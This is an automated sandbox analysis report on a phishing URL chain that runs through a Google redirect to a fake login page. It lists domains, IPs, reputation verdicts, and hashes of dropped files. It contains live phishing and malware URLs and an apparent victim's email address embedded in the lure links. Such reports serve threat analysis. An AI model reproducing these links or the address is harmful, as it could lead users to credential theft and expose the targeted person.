              mithunaads.in
              92.204.40.196
              truefalse
                unknown
                github.com
                140.82.121.4
                truefalse
                  unknown
                  fipyf.orpkf.ru
                  172.67.179.134
                  truefalse
                    unknown
                    hyu.prosolmi.su
                    188.114.97.3
                    truefalse
                      unknown
                      fp2e7a.wpc.phicdn.net
                      192.229.221.95
                      truefalse
                        unknown
                        bg.microsoft.map.fastly.net
                        199.232.214.172
                        truefalse
                          unknown
                          saj.mordantif.com
                          172.67.148.27
                          truefalse
                            unknown
                            code.jquery.com
                            151.101.2.137
                            truefalse
                              unknown
                              d2vgu95hoyrpkh.cloudfront.net
                              18.245.31.78
                              truefalse
                                unknown
                                cdnjs.cloudflare.com
                                104.17.24.14
                                truefalse
                                  unknown
                                  challenges.cloudflare.com
                                  104.18.95.41
                                  truefalse
                                    unknown
                                    get.geojs.io
                                    104.26.1.100
                                    truefalse
                                      unknown
                                      www.google.com
                                      142.250.186.164
                                      truefalse
                                        unknown
                                        d19d360lklgih4.cloudfront.net
                                        13.33.187.120
                                        truefalse
                                          unknown
                                          objects.githubusercontent.com
                                          185.199.110.133
                                          truefalse
                                            unknown
                                            cdn.socket.io
                                            unknown
                                            unknownfalse
                                              unknown
                                              ok4static.oktacdn.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://mithunaads.in/favicon.icofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://saj.mordantif.com/ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223true
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://saj.mordantif.com/uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257true
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://saj.mordantif.com/56RePLZ7UZmHT23036MEuv60true
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://saj.mordantif.com/efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150true
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://a.nel.cloudflare.com/report/v4?s=zHmaNT1qx8G57SnTYFFYFSsgpZAdHZ9PysUswhbqmfcChtngJvyJ%2BJ4c1K7h0YdyL4sDDjIaieIP%2BW9%2FGPlBJT5uYwJWpq6dKiZxOQAzQaR5Jv%2FDmdXlPOTmnfJDhA%3D%3Dfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://saj.mordantif.com/rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200false
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://saj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.ustrue
                                                  unknown
                                                  https://saj.mordantif.com/34PjDiabG2bEMu6719false
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://saj.mordantif.com/ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161false
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=oviTCtqZU1SvWh4Rb9n%2FdQhcqKkeIvf2bmDzToJChqBCMNP3uf8Lqv5FgwTCZfVju99wZWAt1%2F9Q0s%2Bke04dlTbPX8gsxFecebo7gI5ObjkBErCP8HtQP0qiDOy%2Fhw%3D%3Dfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33befalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6Ttrue
                                                    unknown
                                                    https://saj.mordantif.com/45itnDnlBkLf89wB5guMvj2hxy65false
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.jsfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.google.com/recaptcha/api.jsfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://saj.mordantif.com/12KYWgiq1CIPJtcA56dot1AeMqr50false
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==false
                                                      unknown
                                                      https://saj.mordantif.com/q8Yr/false
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://fipyf.orpkf.ru/mcrnzgbukewizymfphpkvhpbdNTtqWTUKJKTWGNEVFPTXALIOMOEGHBDCPCMKMAPGJRGAJFMEAETHXYQQADDRrsZugH7WwfW12wPwx40false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://saj.mordantif.com/qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140false
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://www.google.com/amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://saj.mordantif.com/90cIpGfk2aMerArq2KIwyO12gL058Oayz79false
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://saj.mordantif.com/ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcqfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://saj.mordantif.com/347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110false
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://saj.mordantif.com/wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172false
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==false
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://saj.mordantif.com/q8Yr/?ILhans.anderson@ag.state.mn.usfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/pq4G6HI3Ijg6dT2j1yzOjuv38false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/favicon.icofalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=autofalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://saj.mordantif.com/jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzkfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://saj.mordantif.com/abPT4sUgOrsEgh28false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://hyu.prosolmi.su/303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZVfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://get.geojs.io/v1/ip/geo.jsonfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8c285aefbf971821/1726232795430/35d15596e15914e0c91615707e683afd29cca0ae83719ab89b59c4812845ce0c/F9IyQelDIMunbIFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://saj.mordantif.com/kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220false
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.gstatic.c..?/recaptcha/releases/EGbODne6buzpTnWrrBprcfAY/recaptcha__.chromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.google.com/recaptcha#6262736chromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.google.com/recaptcha/?hl=en#6223828chromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cloud.google.com/contactchromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://github.com/fent)chromecache_140.2.dr, chromecache_139.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.google.com/recaptcha/#6175971chromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/recaptcha/api2/chromecache_130.2.dr, chromecache_102.2.dr, chromecache_143.2.dr, chromecache_141.2.drfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.google.com/recaptchachromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://recaptcha.netchromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://play.google.com/log?format=json&hasfast=truechromecache_143.2.drfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_102.2.dr, chromecache_143.2.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.18.94.41
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.26.1.100
                                                        get.geojs.ioUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        18.245.31.78
                                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        3.161.119.88
                                                        unknownUnited States
                                                        16509AMAZON-02USfalse
                                                        185.199.111.133
                                                        unknownNetherlands
                                                        54113FASTLYUSfalse
                                                        172.67.148.27
                                                        saj.mordantif.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        151.101.194.137
                                                        unknownUnited States
                                                        54113FASTLYUSfalse
                                                        172.67.179.134
                                                        fipyf.orpkf.ruUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.21.43.126
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        185.199.110.133
                                                        objects.githubusercontent.comNetherlands
                                                        54113FASTLYUSfalse
                                                        104.17.24.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.184.196
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        13.33.187.120
                                                        d19d360lklgih4.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        104.21.55.124
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.18.95.41
                                                        challenges.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        140.82.121.4
                                                        github.comUnited States
                                                        36459GITHUBUSfalse
                                                        216.58.206.68
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        151.101.2.137
                                                        code.jquery.comUnited States
                                                        54113FASTLYUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        188.114.97.3
                                                        hyu.prosolmi.suEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        188.114.96.3
                                                        unknownEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        172.67.70.233
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.186.164
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        92.204.40.196
                                                        mithunaads.inGermany
                                                        34011GD-EMEA-DC-CGN1DEfalse
                                                        104.17.25.14
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        18.239.50.4
                                                        unknownUnited States
                                                        16509AMAZON-02USfalse
                                                        IP
                                                        192.168.2.5
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1510807
                                                        Start date and time:2024-09-13 15:05:18 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 52s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:7
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal96.phis.win@20/103@56/28
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 64.233.184.84, 142.250.184.227, 142.250.186.46, 142.250.186.99, 172.217.23.110, 173.194.76.84, 34.104.35.123, 192.229.221.95, 40.68.123.157, 199.232.214.172, 13.95.31.18, 88.221.110.91, 2.16.100.168, 20.3.187.198, 142.250.181.234, 142.250.185.138, 142.250.186.138, 172.217.16.138, 142.250.186.42, 142.250.185.234, 142.250.186.106, 142.250.185.170, 142.250.186.74, 142.250.74.202, 142.250.185.202, 142.250.184.202, 142.250.185.106, 142.250.184.234, 142.250.185.74, 142.250.186.170, 142.250.185.99, 142.250.185.163
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 12:06:23 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):3.973338507536532
                                                        Encrypted:false
                                                        SSDEEP:48:84+YdLCTruxw3HlOidAKZdA19ehwiZUklqehAy+3:844Py/y
                                                        MD5:12C430E41D2F93AA2406D792CCE47753
                                                        SHA1:920E5F4BF3E396E6B9CB6334B4FF957285ACB3CD
                                                        SHA-256:5F08F9D155BC53A25735206E4CB3AB4E34D586EAC995A55F2493F3EEBA040208
                                                        SHA-512:46C351A619745414653EF78ABA78012AFD6D8A1F6BCDA194A418258099ECC514E43A1581AADF91749E4F51E16C4719C886C4BD27FE46C15201E17942FC202E76
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,....Q6.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Y.h...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 12:06:23 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2679
                                                        Entropy (8bit):3.988629116815505
                                                        Encrypted:false
                                                        SSDEEP:48:8pdLCTruxw3HlOidAKZdA1weh/iZUkAQkqehvy+2:8CPo9QKy
                                                        MD5:C4391638563F3BFD779AA9A69CBC4844
                                                        SHA1:9C892371EB9853CB0F925B1CEEF09477D3A10353
                                                        SHA-256:0DCC2F43733F349761519D7E76D36C75591E12C401CF57A4923D7DDF8C37A2E7
                                                        SHA-512:242150D3DEEAF0A3A3AC1F7D35D4B05FD07A7F94861DEF235F29167A38AD123B8F316366A26180F6D0DF335786E193D1D96C55C3B8279DC5119E1D779D81ABF3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Y.h...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2693
                                                        Entropy (8bit):3.998840306470812
                                                        Encrypted:false
                                                        SSDEEP:48:8x7dLCTruxwsHlOidAKZdA14tseh7sFiZUkmgqeh7spy+BX:8xEP9nLy
                                                        MD5:C4779FB33A137F83843DDB68A1163496
                                                        SHA1:D426F0E8F4DA3DCE0220E5779804AE69A6CAE30C
                                                        SHA-256:E9EEEA66D997FBBA7B8CD348C099EEB51C2933698163B1CB149E1BB0EB598412
                                                        SHA-512:D22CD0557F13A540F20E6623120D7802C173D1A2C748AAB071A76B1931551EFF249D43FA552ECC24D67DEDB5F3B35DD6E57BBD390624DDBEB169949095D50339
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 12:06:23 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2681
                                                        Entropy (8bit):3.986747688403008
                                                        Encrypted:false
                                                        SSDEEP:48:8BdLCTruxw3HlOidAKZdA1vehDiZUkwqehzy+R:8KPzxy
                                                        MD5:D6852B834DC3E7E7AF9B96D357C05DD0
                                                        SHA1:828522E3D7EF2982671855DB91EA2C4FE3AD36ED
                                                        SHA-256:A4EB551AEB94F5584BCFDD2D95C6DDB09EAAE186B9EA52641007AF2E0282B186
                                                        SHA-512:E677E3E10FF17CDC27F9D4F04B8E250EBCD6E54049644391DF411435504185167F8276AEC2D567129C5AAD5F462C26E90FBC0744911614CB2D92A44C142559F3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,.....!.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Y.h...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 12:06:23 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2681
                                                        Entropy (8bit):3.9745332808049265
                                                        Encrypted:false
                                                        SSDEEP:48:8fMdLCTruxw3HlOidAKZdA1hehBiZUk1W1qehVy+C:8fZPj91y
                                                        MD5:048D5A69F9C5FB6E7F01179AB74616CE
                                                        SHA1:15367B1B62BEC798A0D8AC7ADFA23EB23B075F5F
                                                        SHA-256:039DCC71145C70838C10F9252E0EC6C77E1A869831105F03FFAD658E544772E9
                                                        SHA-512:5C0DCB724DF5FB8355B010562569E42E4A05D65AF87A8428254BF39CC8A9C921F79FC588B5C1654C825FB26EB4EFF19C0426429F3D0B9FBCEE3309204F8D2986
                                                        Malicious:false
                                                        Reputation:low
